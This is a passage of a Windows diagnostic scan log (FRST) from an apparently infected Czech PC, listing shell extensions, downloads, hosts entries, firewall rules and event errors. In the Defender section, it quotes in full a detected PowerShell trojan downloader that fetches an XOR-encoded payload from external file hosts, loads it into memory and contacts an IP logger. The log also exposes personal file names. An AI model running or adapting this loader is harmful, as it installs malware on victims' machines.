ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


Windows Defender:
===================================
Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
